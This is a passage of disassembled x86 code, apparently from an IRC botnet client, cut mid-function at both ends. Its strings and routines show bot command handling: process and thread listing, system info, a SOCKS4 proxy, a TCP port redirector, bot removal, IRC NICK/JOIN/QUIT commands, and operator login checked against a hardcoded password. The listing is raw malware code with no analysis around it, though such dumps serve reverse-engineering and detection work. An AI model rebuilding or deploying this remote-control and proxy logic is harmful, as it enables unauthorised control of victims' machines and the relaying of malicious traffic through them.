call __snprintf
mov eax, [ebp+arg_4]
mov esi, dword ptr [ebp+esi+Args]
mov [ebp+var_4E0], eax
mov eax, [ebp+var_4]
mov [ebp+var_454], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_450], eax
mov [ebp+var_458], ebx
jz short loc_40E102
push esi ; Str2
push offset aFull ; "full"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40E102
mov [ebp+var_458], 1
loc_40E102: ; CODE XREF: sub_409557+4B8E�j
; sub_409557+4B9F�j
lea eax, [ebp+Dst]
push offset aProcsProccessL ; "[PROCS]: Proccess list."
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 1Eh ; int
push eax ; Source
call sub_411C3A
add esp, 14h
mov [ebp+var_45C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4E0]
push ebx
push eax
push offset sub_408AE3
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_45C]
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_40E170
loc_40E15A: ; CODE XREF: sub_409557+4C17�j
cmp [ebp+var_44C], ebx
jnz loc_40B858
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40E15A
; ---------------------------------------------------------------------------
loc_40E170: ; CODE XREF: sub_409557+4C01�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Dst]
push offset aProcsFailedT_0 ; "[PROCS]: Failed to start listing thread"...
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_40B858
; ---------------------------------------------------------------------------
loc_40E190: ; CODE XREF: sub_409557+1160�j
; sub_409557+1175�j
cmp [ebp+var_8], ebx
jnz short loc_40E1AF
push ebx ; int
push [ebp+var_4] ; int
push offset aMainRemovingBo ; "[MAIN]: Removing Bot."
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
add esp, 14h
loc_40E1AF: ; CODE XREF: sub_409557+4C3C�j
push [ebp+arg_4]
call dword_42EC48 ; closesocket
call dword_42EB20 ; WSACleanup
call sub_40724A
push ebx
call ds:dword_41B090 ; ExitProcess
loc_40E1CA: ; CODE XREF: sub_409557+1136�j
; sub_409557+114B�j
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push [ebp+arg_4]
push eax
call sub_410E85
pop ecx
pop ecx
push eax ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
push offset aMainSystemInfo ; "[MAIN]: System Info."
jmp short loc_40E222
; ---------------------------------------------------------------------------
loc_40E1F5: ; CODE XREF: sub_409557+110C�j
; sub_409557+1121�j
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_411139
add esp, 0Ch
push eax ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
push offset aMainNetworkInf ; "[MAIN]: Network Info."
loc_40E222: ; CODE XREF: sub_409557+4A10�j
; sub_409557+4C9C�j
call sub_402D63
jmp loc_40CF21
; ---------------------------------------------------------------------------
loc_40E22C: ; CODE XREF: sub_409557+10E2�j
; sub_409557+10F7�j
push [ebp+var_8] ; int
push [ebp+var_4] ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_402E03
loc_40E240: ; CODE XREF: sub_409557+3C5�j
; sub_409557+4A70�j ...
add esp, 10h
jmp loc_4099D2
; ---------------------------------------------------------------------------
loc_40E248: ; CODE XREF: sub_409557+10B8�j
; sub_409557+10CD�j
cmp [ebp+var_C], ebx
mov [ebp+var_374], bl
jz short loc_40E287
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
jz short loc_40E287
push esi ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40E287
push eax
push offset aS_2 ; "%s"
lea eax, [ebp+var_374]
push 80h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
loc_40E287: ; CODE XREF: sub_409557+4CFA�j
; sub_409557+4D05�j ...
push [ebp+var_8C] ; Format
lea eax, [ebp+var_3F4]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+arg_4]
push offset aLogListingLog_ ; "[LOG]: Listing log."
mov [ebp+var_3F8], eax
mov eax, [ebp+var_4]
mov [ebp+var_2F0], eax
mov eax, [ebp+var_8]
mov [ebp+var_2EC], eax
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 1Ch ; int
push eax ; Source
call sub_411C3A
add esp, 20h
mov [ebp+var_2F4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3F8]
push ebx
push eax
push offset sub_402E75
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_2F4]
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_40E327
loc_40E311: ; CODE XREF: sub_409557+4DCE�j
cmp [ebp+var_2E8], ebx
jnz loc_4099D2
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40E311
; ---------------------------------------------------------------------------
loc_40E327: ; CODE XREF: sub_409557+4DB8�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
push offset aLogFailedToSta ; "[LOG]: Failed to start listing thread, "...
jmp loc_40E960
; ---------------------------------------------------------------------------
loc_40E338: ; CODE XREF: sub_409557+108E�j
; sub_409557+10A3�j
push [ebp+var_4] ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_402CEB
push offset aMainAliasList_ ; "[MAIN]: Alias list."
call sub_402D63
jmp loc_40DED4
; ---------------------------------------------------------------------------
loc_40E358: ; CODE XREF: sub_409557+1064�j
; sub_409557+1079�j
push [ebp+var_8C] ; Format
lea eax, [ebp+var_4DC]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+arg_4]
mov esi, dword ptr [ebp+esi+Args]
mov [ebp+var_4E0], eax
mov eax, [ebp+var_4]
mov [ebp+var_454], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_450], eax
jz short loc_40E3B2
push offset aSub ; "sub"
push esi ; Str1
call _strcmp
neg eax
sbb eax, eax
pop ecx
inc eax
pop ecx
mov [ebp+var_458], eax
jmp short loc_40E3B8
; ---------------------------------------------------------------------------
loc_40E3B2: ; CODE XREF: sub_409557+4E3F�j
mov [ebp+var_458], ebx
loc_40E3B8: ; CODE XREF: sub_409557+4E59�j
lea eax, [ebp+Dst]
push offset aThreadsListThr ; "[THREADS]: List threads."
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 1Fh ; int
push eax ; Source
call sub_411C3A
add esp, 14h
mov [ebp+var_45C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4E0]
push ebx
push eax
push offset sub_411CA5
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_45C]
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_40E422
loc_40E410: ; CODE XREF: sub_409557+4EC9�j
cmp [ebp+var_44C], ebx
jnz short loc_40E43D
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40E410
; ---------------------------------------------------------------------------
loc_40E422: ; CODE XREF: sub_409557+4EB7�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
push offset aThreadsFaile_0 ; "[THREADS]: Failed to start list thread,"...
loc_40E42E: ; CODE XREF: sub_409557+3E10�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40E43D: ; CODE XREF: sub_409557+2245�j
; sub_409557+2267�j ...
lea eax, [ebp+Dst]
push eax
jmp loc_40A84F
; ---------------------------------------------------------------------------
loc_40E449: ; CODE XREF: sub_409557+FE8�j
; sub_409557+FFD�j
push offset aFenr ; "FEnR"
lea eax, [ebp+Dst]
push offset aMainBotIdS_ ; "[MAIN]: Bot ID: %s."
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
add esp, 20h
jmp loc_40CCC6
; ---------------------------------------------------------------------------
loc_40E480: ; CODE XREF: sub_409557+FBE�j
; sub_409557+FD3�j
push dword_4750D0
call sub_410D66
push eax
lea eax, [ebp+Dst]
push offset aMainStatusRead ; "[MAIN]: Status: Ready. Bot Uptime: %s."
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
add esp, 24h
jmp loc_40CCC6
; ---------------------------------------------------------------------------
loc_40E4BE: ; CODE XREF: sub_409557+F94�j
; sub_409557+FA9�j
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
jz short loc_40E4F0
cmp [ebp+var_C], ebx
jz short loc_40E4FF
push esi ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40E4FF
push eax ; Args
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+arg_4] ; int
call sub_405E1E
add esp, 0Ch
jmp short loc_40E4FF
; ---------------------------------------------------------------------------
loc_40E4F0: ; CODE XREF: sub_409557+4F70�j
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+arg_4] ; int
call sub_405E1E
pop ecx
pop ecx
loc_40E4FF: ; CODE XREF: sub_409557+4F75�j
; sub_409557+4F84�j ...
push 0FFFFFFFEh
jmp loc_4099D4
; ---------------------------------------------------------------------------
loc_40E506: ; CODE XREF: sub_409557+F6A�j
; sub_409557+F7F�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+arg_4] ; int
call sub_405E1E
push offset aMainDisconnect ; "[MAIN]: Disconnecting."
call sub_402D63
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_4099D5
; ---------------------------------------------------------------------------
loc_40E528: ; CODE XREF: sub_409557+F40�j
; sub_409557+F55�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4] ; int
call sub_405E1E
push offset aMainReconnecti ; "[MAIN]: Reconnecting."
call sub_402D63
add esp, 0Ch
xor eax, eax
jmp loc_4099D5
; ---------------------------------------------------------------------------
loc_40E549: ; CODE XREF: sub_409557+F16�j
; sub_409557+F2B�j
push [ebp+var_4] ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_4021A2
jmp loc_40CE8A
; ---------------------------------------------------------------------------
loc_40E55F: ; CODE XREF: sub_409557+E71�j
; sub_409557+E86�j
push dword ptr [ebp+esi+Args] ; Str
push 1Eh ; int
push offset aProcessList ; "Process list"
push offset aProc ; "[PROC]"
loc_40E572: ; CODE XREF: sub_409557+CEC�j
; sub_409557+D15�j ...
push [ebp+var_8] ; int
push [ebp+var_4] ; int
push [ebp+var_8C] ; int
push [ebp+arg_4] ; int
call sub_411EC8
add esp, 20h
jmp loc_4099D2
; ---------------------------------------------------------------------------
loc_40E58E: ; CODE XREF: sub_409557+CAD�j
; sub_409557+CC2�j
mov edi, dword ptr [ebp+esi+Args]
cmp edi, ebx
jz short loc_40E5AD
push edi ; Str
call _atoi
test eax, eax
pop ecx
jz short loc_40E5AD
push edi ; Str
call _atoi
pop ecx
jmp short loc_40E5B2
; ---------------------------------------------------------------------------
loc_40E5AD: ; CODE XREF: sub_409557+5040�j
; sub_409557+504B�j
mov eax, dword_424A44
loc_40E5B2: ; CODE XREF: sub_409557+5054�j
mov esi, [ebp+esi+var_8C]
mov [ebp+var_464], eax
cmp esi, ebx
jz short loc_40E5D7
push esi ; Format
loc_40E5C4: ; CODE XREF: sub_409557+508F�j
lea eax, [ebp+var_474]
push 10h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_40E5EE
; ---------------------------------------------------------------------------
loc_40E5D7: ; CODE XREF: sub_409557+506A�j
cmp [ebp+var_9B3], bl
jz short loc_40E5E8
lea eax, [ebp+var_C4]
push eax
jmp short loc_40E5C4
; ---------------------------------------------------------------------------
loc_40E5E8: ; CODE XREF: sub_409557+5086�j
mov [ebp+var_474], bl
loc_40E5EE: ; CODE XREF: sub_409557+507E�j
mov eax, [ebp+var_4]
push [ebp+var_8C] ; Format
mov esi, [ebp+arg_4]
mov [ebp+var_458], eax
mov eax, [ebp+var_8]
push 80h ; Count
mov [ebp+var_454], eax
lea eax, [ebp+var_4F4]
push eax ; Dest
mov [ebp+var_4F8], esi
call __snprintf
add esp, 0Ch
push [ebp+var_464]
push esi
call sub_408401
pop ecx
push eax
lea eax, [ebp+Dst]
push offset aSocks4ServerSt ; "[SOCKS4]: Server started on: %s:%d."
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 11h ; int
push eax ; Source
call sub_411C3A
add esp, 1Ch
mov [ebp+var_460], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F8]
push ebx
push eax
push offset sub_4103F5
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_460]
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_40E69F
loc_40E689: ; CODE XREF: sub_409557+5146�j
cmp [ebp+var_450], ebx
jnz loc_4099D2
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40E689
; ---------------------------------------------------------------------------
loc_40E69F: ; CODE XREF: sub_409557+5130�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
push offset aSocks4FailedTo ; "[SOCKS4]: Failed to start server thread"...
jmp loc_40E960
; ---------------------------------------------------------------------------
loc_40E6B0: ; CODE XREF: sub_409557+C83�j
; sub_409557+C98�j
push offset aFenr_0 ; "FEnR"
push offset aMainS ; "[MAIN]: %s"
jmp loc_40CC81
; ---------------------------------------------------------------------------
loc_40E6BF: ; CODE XREF: sub_409557+C59�j
; sub_409557+C6E�j
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
jz short loc_40E719
push esi ; Str
call _atoi
cmp eax, ebx
pop ecx
jl short loc_40E711
cmp eax, 2
jge short loc_40E711
mov edx, [ebp+Str1]
mov ecx, eax
shl ecx, 7
cmp [ecx+edx], bl
lea esi, [ecx+edx]
jz short loc_40E709
lea eax, [esi+1]
push eax
lea eax, [ebp+Dst]
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
push eax ; Dest
call _sprintf
add esp, 0Ch
mov [esi], bl
jmp loc_40CA4B
; ---------------------------------------------------------------------------
loc_40E709: ; CODE XREF: sub_409557+5191�j
push eax
push offset aMainNoUserLogg ; "[MAIN]: No user logged in at slot: %d."
jmp short loc_40E756
; ---------------------------------------------------------------------------
loc_40E711: ; CODE XREF: sub_409557+517C�j
; sub_409557+5181�j
push eax
push offset aMainInvalidLog ; "[MAIN]: Invalid login slot number: %d."
jmp short loc_40E756
; ---------------------------------------------------------------------------
loc_40E719: ; CODE XREF: sub_409557+5171�j
mov edi, [ebp+Str1]
xor esi, esi
loc_40E71E: ; CODE XREF: sub_409557+51E3�j
push [ebp+Str2] ; Str2
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40E741
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40E71E
jmp loc_40CA4B
; ---------------------------------------------------------------------------
loc_40E741: ; CODE XREF: sub_409557+51D7�j
mov eax, [ebp+Str1]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_C4]
push eax
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
loc_40E756: ; CODE XREF: sub_409557+1834�j
; sub_409557+1862�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_40CA4B
; ---------------------------------------------------------------------------
loc_40E76A: ; CODE XREF: sub_409557+C2F�j
; sub_409557+C44�j
push dword ptr [ebp+Args] ; Str2
push offset a332 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40E7D9
call sub_411E03
push ebx
call ds:dword_41B090 ; ExitProcess
loc_40E78C: ; CODE XREF: sub_409557+C05�j
; sub_409557+C1A�j
push dword ptr [ebp+esi+Args] ; Str1
xor eax, eax
cmp [ebp+var_9A4], bl
setnz al
push eax ; int
lea eax, [ebp+var_564]
push dword_424A68 ; int
push eax ; Dest
call sub_40FA38
lea eax, [ebp+var_564]
push eax ; Args
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4] ; int
call sub_405E1E
lea eax, [ebp+var_564]
push eax ; Args
push offset aMainRandomNick ; "[MAIN]: Random nick change: %s"
call sub_402DD7
loc_40E7D6: ; CODE XREF: sub_409557+2466�j
add esp, 24h
loc_40E7D9: ; CODE XREF: sub_409557+643�j
; sub_409557+64F�j ...
mov eax, [ebp+File]
jmp loc_4099D5
; ---------------------------------------------------------------------------
loc_40E7E1: ; CODE XREF: sub_409557+6D2�j
; sub_409557+6E7�j
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
mov [ebp+Src], esi
jz loc_4099D2
cmp [ebp+var_AC], ebx
jnz loc_4099D2
push offset asc_42734C ; "!"
push [ebp+Str2] ; Str
call _strtok
mov esi, eax
push offset byte_475258 ; Delim
push ebx ; Str
inc esi
call _strtok
push offset asc_42569C ; "~"
push eax ; Str
call _strtok
push [ebp+Src] ; Str2
mov edi, eax
push offset a19736666386888 ; "19736666386888"
call _strcmp
add esp, 20h
test eax, eax
jz short loc_40E889
lea eax, [ebp+var_C4]
push edi
push eax
lea eax, [ebp+var_C4]
push eax ; Args
push offset aNoticeSPassAut ; "NOTICE %s :Pass auth failed (%s!%s).\r\n"
push [ebp+arg_4] ; int
call sub_405E1E
lea eax, [ebp+var_C4]
push eax ; Args
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4] ; int
call sub_405E1E
push edi
push esi
push offset aMainFailedPass ; "[MAIN]: *Failed pass auth by: (%s!%s)."
loc_40E875: ; CODE XREF: sub_409557+538E�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 30h
jmp loc_40CA6C
; ---------------------------------------------------------------------------
loc_40E889: ; CODE XREF: sub_409557+52E5�j
mov [ebp+File], offset off_424B10
loc_40E890: ; CODE XREF: sub_409557+5355�j
mov eax, [ebp+File]
push edi
push dword ptr [eax]
call sub_411F93
pop ecx
test eax, eax
pop ecx
jnz short loc_40E8E7
add [ebp+File], 4
cmp [ebp+File], offset off_424B14
jl short loc_40E890
lea eax, [ebp+var_C4]
push edi
push eax
lea eax, [ebp+var_C4]
push eax ; Args
push offset aNoticeSHostAut ; "NOTICE %s :Host Auth failed (%s!%s).\r\n"
push [ebp+arg_4] ; int
call sub_405E1E
lea eax, [ebp+var_C4]
push eax ; Args
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4] ; int
call sub_405E1E
push edi
push esi
push offset aMainFailedHost ; "[MAIN]: *Failed host auth by: (%s!%s)."
jmp short loc_40E875
; ---------------------------------------------------------------------------
loc_40E8E7: ; CODE XREF: sub_409557+5348�j
mov edi, [ebp+Str1]
xor esi, esi
loc_40E8EC: ; CODE XREF: sub_409557+53BF�j
cmp [ebp+Src], ebx
jz loc_4099D2
cmp [edi], bl
jnz short loc_40E90C
push [ebp+Src] ; Str2
push offset a19736666386888 ; "19736666386888"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40E91D
loc_40E90C: ; CODE XREF: sub_409557+53A0�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40E8EC
jmp loc_4099D2
; ---------------------------------------------------------------------------
loc_40E91D: ; CODE XREF: sub_409557+53B3�j
shl esi, 7
add esi, [ebp+Str1]
lea eax, [ebp+var_A94]
push 7Fh ; Count
push eax ; Source
push esi ; Dest
call _strncpy
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_40E954
push ebx ; int
push [ebp+var_4] ; int
push offset aMainPasswordAc ; "[MAIN]: Password accepted."
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
add esp, 14h
loc_40E954: ; CODE XREF: sub_409557+53E1�j
lea eax, [ebp+var_C4]
push eax ; Args
push offset aMainUserSLog_1 ; "[MAIN]: User: %s logged in."
loc_40E960: ; CODE XREF: sub_409557+59B�j
; sub_409557+4DDC�j ...
call sub_402DD7
pop ecx
loc_40E966: ; CODE XREF: sub_409557+230D�j
pop ecx
jmp loc_4099D2
; ---------------------------------------------------------------------------
loc_40E96C: ; CODE XREF: sub_409557+20E�j
; sub_409557+223�j
push [ebp+Dest] ; Args
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4] ; int
call sub_405E1E
push offset asc_424AF8 ; "+x"
push [ebp+Dest] ; Args
push offset aModeSS ; "MODE %s %s\r\n"
push [ebp+arg_4] ; int
call sub_405E1E
push [ebp+arg_C]
push [ebp+arg_8] ; Args
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4] ; int
call sub_405E1E
add esp, 2Ch
mov dword_475250, edi
jmp loc_4097F4
sub_409557 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E9B2 proc near ; DATA XREF: sub_409557+2F37�o
Source = byte ptr -34Ch
var_14C = byte ptr -14Ch
var_148 = dword ptr -148h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
rep movsd
push 1
xor esi, esi
pop edi
push 10h
mov [eax+120h], edi
pop ebx
lea eax, [ebp+Dst]
push ebx ; Size
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_40]
call dword_42EBB4 ; htons
push 6
push edi
push 2
mov [ebp+var_E], ax
mov [ebp+var_C], esi
mov [ebp+arg_0], ebx
call dword_42EC30 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40EB16
mov eax, [ebp+var_3C]
push edi
imul eax, 234h
push 401h
push esi
push ebx
mov dword_43054C[eax], ebx
call dword_42EAE0 ; WSAAsyncSelect
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
call dword_42EBE0 ; bind
test eax, eax
jnz loc_40EB16
push 0Ah
push ebx
call dword_42EBDC ; listen
test eax, eax
jnz loc_40EB16
loc_40EA5C: ; CODE XREF: sub_40E9B2+BE�j
; sub_40E9B2+13F�j
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_24]
push eax
push ebx
call dword_42EC44 ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_40EA5C
movzx eax, [ebp+var_22]
push [ebp+var_3C]
mov [ebp+var_148], edi
mov [ebp+var_2C], esi
push eax
push [ebp+var_20]
call dword_42EC3C ; inet_ntoa
push eax
lea eax, [ebp+Source]
push offset aRedirectClient ; "[REDIRECT]: Client connection from IP: "...
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Source]
push 10h ; int
push eax ; Source
call sub_411C3A
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov dword_430544[eax], ecx
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_14C]
push esi
push eax
push offset sub_40EB3A
push esi
push esi
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_430554[ecx], eax
jz short loc_40EB01
loc_40EAEE: ; CODE XREF: sub_40E9B2+14D�j
cmp [ebp+var_2C], esi
jnz loc_40EA5C
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40EAEE
; ---------------------------------------------------------------------------
loc_40EB01: ; CODE XREF: sub_40E9B2+13A�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax ; Args
push offset aRedirectFail_0 ; "[REDIRECT]: Failed to start client thre"...
call sub_402DD7
pop ecx
pop ecx
jmp short loc_40EB19
; ---------------------------------------------------------------------------
loc_40EB16: ; CODE XREF: sub_40E9B2+61�j
; sub_40E9B2+93�j ...
mov edi, [ebp+arg_0]
loc_40EB19: ; CODE XREF: sub_40E9B2+162�j
push edi
call dword_42EC48 ; closesocket
push ebx
call dword_42EC48 ; closesocket
push [ebp+var_3C]
call sub_411F56
pop ecx
push esi
call ds:dword_41B06C ; ExitThread
pop edi
pop esi
pop ebx
sub_40E9B2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EB3A proc near ; DATA XREF: sub_40E9B2+11C�o
var_1344 = byte ptr -1344h
Source = byte ptr -344h
var_144 = byte ptr -144h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
Dst = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
mov ebx, [ebp+var_30]
push 1
pop ecx
mov [ebp+var_4], ebx
push 6
push ecx
push 2
mov [eax+120h], ecx
call dword_42EC30 ; socket
mov esi, eax
xor edi, edi
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_40ECF0
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_3C]
call dword_42EBB4 ; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_13C]
push eax
call dword_42EBF0 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_40EBCA
lea eax, [ebp+var_13C]
push eax
call dword_42EC34 ; gethostbyname
jmp short loc_40EBD8
; ---------------------------------------------------------------------------
loc_40EBCA: ; CODE XREF: sub_40EB3A+7F�j
push 2
lea eax, [ebp+var_8]
push 4
push eax
call dword_42EB70 ; gethostbyaddr
loc_40EBD8: ; CODE XREF: sub_40EB3A+8E�j
cmp eax, edi
jz loc_40ECF0
mov eax, [eax+0Ch]
push 10h
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_14], eax
lea eax, [ebp+Dst]
push eax
push esi
call dword_42EB60 ; connect
cmp eax, 0FFFFFFFFh
jz loc_40ECF0
movzx eax, [ebp+var_16]
push [ebp+var_34]
mov [ebp+var_20], edi
push eax
push [ebp+var_14]
call dword_42EC3C ; inet_ntoa
push eax
lea eax, [ebp+Source]
push offset aRedirectClie_0 ; "[REDIRECT]: Client connection to IP: %s"...
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Source]
push 10h ; int
push eax ; Source
call sub_411C3A
imul ebx, 234h
mov [ebp+var_30], eax
imul eax, 234h
mov ecx, [ebp+var_34]
lea esi, dword_43054C[ebx]
mov dword_430544[eax], ecx
add esp, 20h
mov ecx, [esi]
mov dword_430550[eax], ecx
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_144]
push edi
push eax
push offset sub_40ED21
push edi
push edi
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_30]
imul ecx, 234h
cmp eax, edi
mov dword_430554[ecx], eax
jz short loc_40ECDD
loc_40EC8A: ; CODE XREF: sub_40EB3A+15D�j
cmp [ebp+var_20], edi
jnz short loc_40EC99
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40EC8A
; ---------------------------------------------------------------------------
loc_40EC99: ; CODE XREF: sub_40EB3A+153�j
mov ebx, 1000h
loc_40EC9E: ; CODE XREF: sub_40EB3A+19F�j
push ebx ; Size
lea eax, [ebp+var_1344]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_1344]
push edi
push ebx
push eax
push dword ptr [esi]
call dword_42EBCC ; recv
cmp eax, edi
jle short loc_40ECF0
push edi
push eax
lea eax, [ebp+var_1344]
push eax
push [ebp+arg_0]
call dword_42EC00 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40EC9E
jmp short loc_40ECF0
; ---------------------------------------------------------------------------
loc_40ECDD: ; CODE XREF: sub_40EB3A+14E�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax ; Args
push offset aRedirectFail_1 ; "[REDIRECT]: Failed to start connection "...
call sub_402DD7
pop ecx
pop ecx
loc_40ECF0: ; CODE XREF: sub_40EB3A+44�j
; sub_40EB3A+A0�j ...
mov eax, [ebp+var_4]
imul eax, 234h
push dword_43054C[eax]
call dword_42EC48 ; closesocket
push [ebp+arg_0]
call dword_42EC48 ; closesocket
push [ebp+var_4]
call sub_411F56
pop ecx
push edi
call ds:dword_41B06C ; ExitThread
pop edi
pop esi
pop ebx
sub_40EB3A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ED21 proc near ; DATA XREF: sub_40EB3A+130�o
Dst = byte ptr -1128h
var_128 = byte ptr -128h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1128h
call __alloca_probe
mov eax, [ebp+arg_0]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_128]
rep movsd
